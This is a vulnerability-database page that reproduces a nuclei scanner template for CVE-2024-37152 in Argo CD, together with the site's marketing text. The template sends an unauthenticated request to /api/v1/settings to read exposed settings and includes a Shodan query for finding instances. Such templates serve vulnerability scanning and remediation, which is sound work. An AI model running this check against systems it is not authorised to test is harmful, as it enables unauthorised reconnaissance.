Lucene search
K

Argo CD Unauthenticated Access to sensitive setting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 217 Views

Argo CD Unauthenticated Access to sensitive setting CVE-2024-3715

Related
Refs
Code
id: CVE-2024-37152

info:
  name: Argo CD Unauthenticated Access to sensitive setting
  author: DhiyaneshDk
  severity: medium
  description: |
    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.
  impact: |
    Unauthenticated attackers can access sensitive password patterns and application settings exposed by the /api/v1/settings endpoint.
  remediation: |
    Update Argo CD to a version that patches CVE-2024-37152.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2
    - https://nvd.nist.gov/vuln/detail/CVE-2024-37152
  classification:
    cve-id: CVE-2024-37152
    cwe-id: CWE-306
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    epss-score: 0.02348
    epss-percentile: 0.81596
    cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: argoproj
    product: argo_cd
    shodan-query: html:"Argo CD"
  tags: cve,cve2024,argo-cd,info-leak,vuln

http:
  - raw:
      - |
        GET /api/v1/settings HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"passwordPattern":'
          - '"appLabelKey":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d4d129b4f11e5816f2928db2a9e7165f53d81bf143e3bb74f4cf3c9ece64722902210091a93497d56188105ac09db7c1e1f08f8b7f2504478b98df3e5f6a4d34cab031:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.15.3 - 7.5
EPSS0.02348
SSVC
217